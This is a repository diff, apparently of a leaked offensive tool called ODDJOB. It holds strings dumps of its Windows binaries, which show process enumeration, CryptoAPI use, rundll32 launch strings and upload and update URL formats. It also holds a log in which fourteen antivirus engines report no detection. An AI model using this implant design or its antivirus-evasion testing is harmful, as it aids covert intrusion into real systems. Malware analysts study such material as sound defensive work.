~"WP
^SSSSS
j"^SSSSS
QSWVj
WWWWW
<Xt
u,9E
u29u
SSSSV
t<Vj
t+SSVPV
WWWWW
u:hX)
SVW}
E 9}
WWWW
tb9} u
@h44
WWWWW
_^[]
WWWWW
SSSSS
WWWWW
WWWWW
^_[3
CorExitProcess
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
R6034
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
R6033
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
R6032
- not enough space for locale information
R6031
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
R6030
- CRT not initialized
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
(null)
Invalid parameter passed to C runtime function.
EncodePointer
KERNEL32.DLL
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
InitializeCriticalSectionAndSpinCount
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
( 8PX
700WP
`h````
xpxxxx
('8PW
700PP
`h`hhh
xppwpp
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SetThreadStackGuarantee
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
IsWow64Process
alwo
p PfH
GetSystemTimeAsFileTime
GetModuleFileNameW
SetErrorMode
GetFileAttributesW
TerminateProcess
GetTempPathW
MoveFileW
CloseHandle
GetWindowsDirectoryW
DeleteFileW
GetCurrentProcessId
GetTempFileNameW
GetFileSize
MoveFileExW
WriteFile
ReadFile
CreateFileW
GetLastError
ExitProcess
VirtualQuery
CreateProcessW
VirtualFree
OpenProcess
SetLastError
VirtualAlloc
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
GetEnvironmentVariableW
GetCurrentProcess
GetComputerNameW
GetModuleHandleW
WideCharToMultiByte
GetVersionExW
GetProcAddress
LocalAlloc
LocalFree
FindResourceW
LoadResource
SizeofResource
LockResource
HeapFree
HeapAlloc
HeapReAlloc
GetCommandLineA
GetVersionExA
UnhandledExceptionFilter
SetUnhandledExceptionFilter
HeapDestroy
HeapCreate
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
GetModuleHandleA
GetStdHandle
GetModuleFileNameA
OutputDebugStringA
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
InterlockedDecrement
GetCurrentThreadId
GetCPInfo
GetACP
GetOEMCP
SetHandleCount
GetFileType
GetStartupInfoA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetTickCount
InitializeCriticalSection
RtlUnwind
LoadLibraryA
SetFilePointer
GetConsoleCP
GetConsoleMode
MultiByteToWideChar
Sleep
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
VirtualProtect
GetSystemInfo
CreateFileA
FlushFileBuffers
KERNEL32.dll
wsprintfW
USER32.dll
CryptAcquireContextW
CryptDeriveKey
CryptReleaseContext
CryptGenRandom
CryptEncrypt
CryptCreateHash
CryptDestroyKey
CryptDecrypt
CryptDestroyHash
CryptHashData
OpenProcessToken
GetUserNameW
GetTokenInformation
EqualSid
AllocateAndInitializeSid
FreeSid
ADVAPI32.dll
CoTaskMemFree
CoCreateInstance
CoUninitialize
CoInitializeEx
ole32.dll
ABABABABABABABABABAB.dll
start
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PA
5/6L6
888C8_8q8
:>;W;j;`<f<s<
<==q=
>+>x>
?0?{?
5I5Z5
546G6N6p6x6
7`8i8
909T9m9{9
9p:{:
[0w0
202?2X2
9K9W9
=h=n=}=
>!?[?a?j?o?{?
Q0[0o4
5+8C8b8
8%9A9
:B:a:k:u:
;);;;
>d>y>
0 1T1Z1f1
292@2K3
6.646:6?6_6d6n6
:&:.:6:>:J:S:X:^:h:q:|:
<&<0<<<E<M<W<]<c<p<w<
="=+=>=b=
>,>2>9>F>M>S>[>a>s>x>
101C1N1T1Z1_1h1
2+2<2B2S2
2T6`6
919N9
;T;o;u;~;
;3<;<M<U<h<x<}<
===B=M=R=p=
>Q>i>t>
?>?Q?c?
j0r0
749d9
?"?-?9?N?T?]?d?|?
0#000Q0[0v0
152=2
3#3*30373=3E3L3Q3Y3b3n3s3x3~3
4=4C4
6C6a6h6l6p6t6x6|6
6F7Q7l7s7x7|7
8 8j8p8t8x8|8
9Z9q9
:/;<;F;T;];g;
<A<[<
=&>2>E>W>r>z>
>!?J?[?~?
C0m0
2)2e2V3
5P5X5
6K6]6
707=7
8j:}:
:0;6;L;W;n;z;
<'<Y<r<
=)=9=k=q=z=
=*>_>x>
? ?$?n?t?x?|?
0 0A0k0
293G3
4 4%454d4r4
5(6B6Y6_6r6w6
899F9e9}9
30d0z0
3*353C3Q3X3g3s3
3&454>4[4
9+9*:
>#>c>
3"545F5h5z5
597F7N7\7n7z7
:5;A;
=.=D=Y=y=
=6>R>
?'?D?N?W?b?w?~?
0#0(060
121=1`1
1g2o2
7*7D7a7
9a:t:
;T<h=
> >/>
>8?d?
1L2{2P4V4\4b4
2$2(2
\:`:
; ;$;,;0;8;<;D;H;P;T;\;`;h;l;
<0<P<l<p<
=0=L=P=l=p=x=|=
>0>P>
3$3,343<3D3L3T3\3`3d3
9(989\9h9l9p9t9x9
9@:D:H:L:P:T:X:\:`:d:h:p:
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
(null)
kernel32.dll
((((( H
h(((( H
H
kernel32
https
https
https
version
%s%s%d%d%s
COMMONPROGRAMFILES(x86)
<Process pid=%d ppid=%d threadCount=%d %s\>
%s\%s
rundll
rundll32
rundll32
BINARY
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
Process id: %lu
%s/%s%s
%s\Temp\%s
%s%s
%s%d%dupdate.xml
%s/%d%dupdate.xml
%s/uploads/%d%d%d%d%d%d%d%d%d%s
rundll32.exe "%s",%S %s%s
rundll32.exe

730
oddjob/Not-For-Release/oddjob_v3_x86.exestrings.txt Normal file
View file

@ -0,0 +1,730 @@
QQSVW
SVW3
pSVW
CDPP
h`9A
Shh9A
_[t
uXhx9A
PWVj
@@f;
uM!E
SVWh
Phx8A
@@f;
h|4A
h 9A
QSVWhX6A
t1WPV
tdVSP
tB9}
PWWV
u39]
tUSh
54 A
Shp6A
uXjHSh
PWWh
t-Wj
uq9}
PSWWW
PSWj
AAHHJu
Wj Y
j=Yf
j=Yf
u 9E
YY9}
4891r)
D$$
D$hSP
D$`P
D$ P
D$ P
QQSV
54 A
u#jHj
t;8]
u6jD
PVVh
It&It
@@f;
@@f;
AAf;
@@f;
hP5A
vMh@4A
hP4A
=x A
SSSS
w6SSj
=x A
SSSS
w9SSj
SVW3
PjYjCV
QQVW
jUY3
9A;M
SuPW
@@f;
@@f;
t!SWP
@@f;
t>Sj
_^9]
jUZ3
PSSSSSSh
PSSj
h@:A
=8|A
t VP
h`:A
;5(|A
GGBBf
SSSSS
AAf9
WWWWW
=8|A
uaVj
uL9=HgA
AAFFf
=8|A
;5(|A
wIVSP
9=HgA
FVSj
VVVVV
r f=Z
r f=Z
CCGG
t=f;
CCGG
95xgA
VVVVV
r f=Z
r f=Z
GGBB
8VVVVV
f91t
AAKu
AAGGf;
_^[]
=h_A
MZu3
YQPj
5``A
=\`A
%P`A
-L`A
h("A
VVVVV
VVVVV
% |A
5P A
ueSj
=4|A
5 |A
5$|A
5 |A
5$|A
@_^[
VW}
j?^;
Y__^[
9csm
h@"A
h0"A
VVVVV
VVVVV
YYu6h
F95(dA
5$dA
Yh "A
5(dA
QQSV3
SSSSS
PPPPP
SSSSS
SSSSS
SSSSS
5DgA
_[^]
_^[]
VVVV
5hZA
5tZA
5pZA
RPSV
90tN
@t7f
PPPPP
h (A
5pSA
5pSA
hd(A
hT(A
5pSA
5pSA
hd(A
ht(A
5pSA
5PgA
5pSA
5XgA
h(;A
hd(A
t$hT(A
ht(A
5tSA
5pSA
YYt1V
5tSA
5TgA
hH;A
Whd(A
=LgA
=PgA
=TgA
5TgA
5PgA
5LgA
5PgA
5TgA
5XgA
5LgA
5tSA
5TgA
hp;A
0A@@Ju
95\gA
E`gA
Wto=
Y_^[]
_^[]
Fpt"
8csm
S99t
~du
w f
"u 3
SVW3
0@@f
=d_A
t.WSR
PPPPP
5d_A
%d_A
j"AA
AACf
9"uI
t69]
t+f
SVWh
@@f9
@@f9
t.SSj
@@f;
5$!A
j$j _W
Nj$j
t<!E
9MZu+
@\f=
WWWWW
t!h\)A
h4)A
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
9MZt
_^[]
h0<A
hP<A
j hp<A
t+Ht
PPPPP
SVW
SSSSS
hx)A
tm95
SSSSS
0SSSSS
_^[]
0SSSSS
_^[]
VVVVV
WWWWW
WWWWW
VVVVV
VVVVV
GGAAf
@@FFf
@@FF
WWWWW
VVVVV
= dA
VVVVV
VVVVV
Yt"V
Yt.V
Yt"V
Yt.V
Yt"V
YYt}
~%9M
QVj
r 8^
v N+D$
oV f
o^0f
of@f
onPf
ov`f
o~pf
u8SS3
u$SS
t!VV9u u
9] SS
v$;5
PPPPPPPP
_^[]
0SSSSS
PPPPPPPP
5\!A
u6SSj
t @@;
uR9]
9] u
9E Yt
5x A
SSSS
=X!A
txVS
t0WWWWW
Af#E
SVW3
0WWWWW
BBFFf;
_^[]
SVWUj
]_^[
;t$,v-
UQPXY]Y[
VW|[;
_^[]
VVVVV
h(=A
95$^A
=L_A
=$^A
5$^A
hH=A
~,WPV
hh=A
98t^
tVPV
t/9U
~"WP
^SSSSS
j"^SSSSS
QSWVj
WWWWW
<Xt
u,9E
u29u
=x A
SSSSV
t<Vj
t+SSVPV
WWWWW
u:h\)A
SVW}
5d!A
E 9}
WWWW
tb9} u
@h44A
WWWWW
_^[]
WWWWW
SSSSS
WWWWW
WWWWW
^_[3
%\ A
%` A
%d A
%@!A
CorExitProcess
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
R6034
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
R6033
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
R6032
- not enough space for locale information
R6031
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
R6030
- CRT not initialized
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
(null)
Invalid parameter passed to C runtime function.
EncodePointer
KERNEL32.DLL
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
InitializeCriticalSectionAndSpinCount
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
( 8PX
700WP
`h````
xpxxxx
('8PW
700PP
`h`hhh
xppwpp
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SetThreadStackGuarantee
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
IsWow64Process
alwo
p PfH
GetSystemTimeAsFileTime
GetModuleFileNameW
SetErrorMode
GetFileAttributesW
GetTempPathW
MoveFileW
GetWindowsDirectoryW
DeleteFileW
GetCurrentProcessId
GetTempFileNameW
GetFileSize
MoveFileExW
WriteFile
ReadFile
CreateFileW
GetLastError
CloseHandle
ExitProcess
VirtualQuery
CreateProcessW
VirtualFree
SetLastError
VirtualAlloc
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
GetEnvironmentVariableW
GetCurrentProcess
GetComputerNameW
GetModuleHandleW
WideCharToMultiByte
GetVersionExW
GetProcAddress
LocalAlloc
LocalFree
FindResourceW
LoadResource
SizeofResource
LockResource
HeapFree
HeapAlloc
HeapReAlloc
GetVersionExA
GetStartupInfoW
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
HeapDestroy
HeapCreate
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
GetModuleHandleA
GetStdHandle
GetModuleFileNameA
OutputDebugStringA
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
InterlockedDecrement
GetCurrentThreadId
GetCPInfo
GetACP
GetOEMCP
FreeEnvironmentStringsA
MultiByteToWideChar
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
GetCommandLineA
GetCommandLineW
SetHandleCount
GetFileType
GetStartupInfoA
QueryPerformanceCounter
GetTickCount
InitializeCriticalSection
RtlUnwind
LoadLibraryA
SetFilePointer
GetConsoleCP
GetConsoleMode
Sleep
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
VirtualProtect
GetSystemInfo
CreateFileA
FlushFileBuffers
KERNEL32.dll
wsprintfW
USER32.dll
CryptAcquireContextW
CryptDeriveKey
CryptReleaseContext
CryptGenRandom
CryptEncrypt
CryptCreateHash
CryptDestroyKey
CryptDecrypt
CryptDestroyHash
CryptHashData
OpenProcessToken
GetUserNameW
GetTokenInformation
EqualSid
AllocateAndInitializeSid
FreeSid
ADVAPI32.dll
CoTaskMemFree
CoCreateInstance
CoUninitialize
CoInitializeEx
ole32.dll
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PA
5/6L6
848:8V8
:4;G;=<C<P<e<o<{<
0I2h2u2
3\4x4
5[5b5v5
6!6.646A6G6P6t6
6P7`7
9"9k9z9
:(:7:V:i:
;#<5<F>
;.<3<K<p<}<
>8>B>
657b7h7
8E8\8c8n8
9"9q9w9
:&:]:k:I<}<
<4=:=F=
>H?N?r?
"0a0i0~0
4-464<4I4S4^4q4|4
5[5e5
5X6^6d6j6p6v6}6
7!7(7;7W7z7
7-848G8^8d8j8}8
9)9/989K9o9
:$:9:?:F:S:Z:`:h:n:
= =+===P=[=a=g=l=u=
>8>I>O>`>
a2m2
5#5+5A5^5
8C8K8]8e8x8
9$9M9R9]9b9
9%:2:O:
:);N;s;
=9>&?5?P?
:!:%:5:
;#;*;Q;W;b;n;
<"<,<2<?<N<U<b<
=F=l=
>%>/>g>o>
?&?2?7?<?B?F?L?Q?W?_?g?y?
21282<2@2D2H2L2P2T2
3!3<3C3H3L3P3q3
3:4@4D4H4L4
4*5A5
7$7-777n7v7
:':B:J:R:i:
;+;N;
<#=k=
=5>M?S?v?
1o1y1~1
4)4/444<4
5 5-545~5
5#6`6
6(7<7]7c7
8"8J8c8
8:9@9b9
:X:x:
;=;C;L;S;^;j;
<?<X<_<g<l<p<t<
=N=T=X=\=`=
>!>K>}>
>]?i?
2D2R2
3o3x3~3
4"494?4R4W4k4q4
5_5x5
7&7E7]7
:j<;=
>D>Z>
1#11181G1S1h1
2;2c2
8i:y:
>h?r?
3&3H3Z3l3~3
5&5.5<5N5Z5e5
;(;=;];
=(=2=;=F=[=b=h=~=
?!?D?
K0S0
0P2n2
5(5E5q5
6+7m7
7E8X8)9C9I9\9i9q9~9
=S=]=
?B?L?l?
2(2,2
: :X:x:
; ;@;`;l;
<$<(<D<H<d<h<
= =@=`=
3$3,343<3D3L3T3\3d3h3l3
9(989H9l9x9|9
9P:T:X:\:`:d:h:l:p:t:x:
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
(null)
kernel32.dll
((((( H
h(((( H
H
kernel32
https
https
https
version
%s%s%d%d%s
COMMONPROGRAMFILES(x86)
<Process pid=%d ppid=%d threadCount=%d %s\>
%s\%s
rundll
rundll32
rundll32
BINARY
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
Process id: %lu
%s/%s%s
%s\Temp\%s
%s%s
%s%d%dupdate.xml
%s/%d%dupdate.xml
%s/uploads/%d%d%d%d%d%d%d%d%d%s
%s %s%s

BIN
oddjob/Testing-Docs/ODDJOB_Testing.docx Normal file
View file

Binary file not shown.

74
oddjob/Testing-Docs/tungsten_flame.txt Normal file
View file

@ -0,0 +1,74 @@
oddjob_v3_x64.exe
AV Engine Country Signature Updated Info
Alwil (avast) CZ no_virus 2013-07-08 19:22:16
Avira (antivir) DE no_virus 2013-07-07 00:51:32
ClamAV no_virus 2013-07-07 02:20:11
Eset (nod32) US no_virus 2013-07-08 11:38:54
Frisk (f-prot) IS no_virus 2013-07-07 22:23:41
F-Secure FI no_virus 2013-07-08 10:04:09
Kaspersky RU no_virus 2013-07-08 19:29:35
Mcafee US no_virus 2013-07-06 14:40:00
MS Security Essentials US no_virus 2013-07-08 10:07:55
Norman NO no_virus 2013-07-08 04:28:54
Panda ES no_virus 2013-07-07 15:33:32
Rising CN no_virus 2013-07-08 10:07:29
Symantec US no_virus 2013-07-06 09:00:00
Trend Micro JP no_virus 2013-07-07 02:06:49
oddjob_v3_x86.exe
AV Engine Country Signature Updated Info
Alwil (avast) CZ no_virus 2013-07-08 19:22:16
Avira (antivir) DE no_virus 2013-07-07 00:51:32
ClamAV no_virus 2013-07-07 02:20:11
Eset (nod32) US no_virus 2013-07-08 11:38:54
Frisk (f-prot) IS no_virus 2013-07-07 22:23:41
F-Secure FI no_virus 2013-07-08 10:04:09
Kaspersky RU no_virus 2013-07-08 19:29:35
Mcafee US no_virus 2013-07-06 14:40:00
MS Security Essentials US no_virus 2013-07-08 10:07:55
Norman NO no_virus 2013-07-08 04:28:54
Panda ES no_virus 2013-07-07 15:33:32
Rising CN no_virus 2013-07-08 10:07:29
Symantec US no_virus 2013-07-06 09:00:00
Trend Micro JP no_virus 2013-07-07 02:06:49
oddjob_v3_x86.dll
AV Engine Country Signature Updated Info
Alwil (avast) CZ no_virus 2013-07-08 19:22:16
Avira (antivir) DE no_virus 2013-07-07 00:51:32
ClamAV no_virus 2013-07-07 02:20:11
Eset (nod32) US no_virus 2013-07-08 11:38:54
Frisk (f-prot) IS no_virus 2013-07-07 22:23:41
F-Secure FI no_virus 2013-07-08 10:04:09
Kaspersky RU no_virus 2013-07-08 19:29:35
Mcafee US no_virus 2013-07-06 14:40:00
MS Security Essentials US no_virus 2013-07-08 10:07:55
Norman NO no_virus 2013-07-08 04:28:54
Panda ES no_virus 2013-07-07 15:33:32
Rising CN no_virus 2013-07-08 10:07:29
Symantec US no_virus 2013-07-06 09:00:00
Trend Micro JP no_virus 2013-07-07 02:06:49
oddjob_v3_x64.dll
AV Engine Country Signature Updated Info
Alwil (avast) CZ no_virus 2013-07-08 19:22:16
Avira (antivir) DE no_virus 2013-07-07 00:51:32
ClamAV no_virus 2013-07-07 02:20:11
Eset (nod32) US no_virus 2013-07-08 11:38:54
Frisk (f-prot) IS no_virus 2013-07-07 22:23:41
F-Secure FI no_virus 2013-07-08 10:04:09
Kaspersky RU no_virus 2013-07-08 19:29:35
Mcafee US no_virus 2013-07-06 14:40:00
MS Security Essentials US no_virus 2013-07-08 10:07:55
Norman NO no_virus 2013-07-08 04:28:54
Panda ES no_virus 2013-07-07 15:33:32
Rising CN no_virus 2013-07-08 10:07:29
Symantec US no_virus 2013-07-06 09:00:00
Trend Micro JP no_virus 2013-07-07 02:06:49

BIN
oddjob/User-Docs/BITSversions.xlsx Normal file
View file

Binary file not shown.

BIN
oddjob/User-Docs/How_to_setup_IIS_7_for_ODDJOB.docx Normal file
View file

Binary file not shown.